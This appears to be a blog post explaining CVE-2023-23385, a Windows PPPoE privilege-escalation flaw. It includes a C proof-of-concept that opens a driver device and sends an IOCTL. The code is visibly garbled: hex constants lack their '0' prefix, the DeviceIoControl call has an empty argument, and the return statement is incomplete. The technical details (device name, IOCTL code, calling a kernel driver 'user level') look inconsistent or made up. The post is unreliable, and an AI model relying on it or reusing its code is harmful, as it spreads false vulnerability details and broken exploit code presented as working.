CVE-2023-23385 - Explaining the Windows Point-to-Point Protocol over Ethernet (PPPoE) Elevation of Privilege Vulnerability and Its Exploits

In this post, we will dive deep into the details of a significant Point-to-Point Protocol over Ethernet (PPPoE) vulnerability in Windows operating systems, namely CVE-2023-23385. We will take a closer look at how this vulnerability may be exploited, provide code snippets to demonstrate the issue, and offer references for further investigation.

The Vulnerability - An Overview

CVE-2023-23385 is an Elevation of Privilege (EoP) vulnerability that affects the Windows PPPoE implementation. PPPoE is a network protocol widely utilized in DSL broadband connections, and it enables the encapsulation of PPP frames inside Ethernet frames. The affected component is "raspppoe.sys," a Windows PPPoE miniport driver responsible for handling PPPoE connections at the user level.

The vulnerability primarily hinges on insufficient input validation in the IOCTL interface of the raspppoe.sys driver. Consequently, a malicious user or an attacker who already has a foothold on the target system can trigger this vulnerability to elevate their privileges to SYSTEM level - the highest privilege level on a Windows machine.

Exploit Details

To exploit CVE-2023-23385, an attacker needs to craft a malicious IOCTL request targeting the raspppoe.sys driver, bypassing security checks and leading to an out-of-bounds write in kernel memory. This escalation of privileges allows the attacker to execute arbitrary code in the context of the kernel, thereby achieving complete control over the targeted machine.

Here's a code snippet illustrating the basics of triggering the vulnerability

#include <windows.h>
#include <stdio.h>

#define IOCTL_TRIGGER_VULN CTL_CODE(FILE_DEVICE_UNKNOWN, x804, METHOD_NEITHER, FILE_ANY_ACCESS)

int main() {
  TCHAR szDeviceName[] = _T("\\\\.\\RasPppoeAdapter");
  HANDLE hDevice = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);

  printf("[+] CVE-2023-23385 - Windows PPPoE Elevation of Privilege POC\n\n");

  if (hDevice == INVALID_HANDLE_VALUE) {
    printf("[-] Failed to open RasPppoeAdapter device\n");
    return 1;
  }

  printf("[+] Successfully opened RasPppoeAdapter device\n");

  BYTE inBuffer[x100] = {  };
  DWORD bytesReturned;

  DeviceIoControl(hDevice, IOCTL_TRIGGER_VULN, inBuffer, sizeof(inBuffer), NULL, , &bytesReturned, NULL);

  CloseHandle(hDevice);

  return ;
}

This code demonstrates an IOCTL attack vector for triggering the vulnerability. Note that it is only a simple proof-of-concept code - the actual exploit would require more advanced techniques to ensure privilege escalation and execute arbitrary code.

References

For more information on this vulnerability and potential mitigations, please consult the following references:

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23385

2. Microsoft Security Advisory: https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2023-23385

3. Carnegie Mellon Software Engineering Institute - CERT Coordination Center: https://kb.cert.org/vuls/id/605645

Conclusion

CVE-2023-23385 is a critical Elevation of Privilege vulnerability in the Windows PPPoE implementation that can potentially grant attackers complete control over targeted systems. Users are urged to apply the available patches provided by Microsoft to mitigate this risk, and to ensure that systems are kept up-to-date with the latest security updates.

Timeline

Published on: 03/14/2023 17:15:00 UTC
Last modified on: 03/23/2023 16:59:00 UTC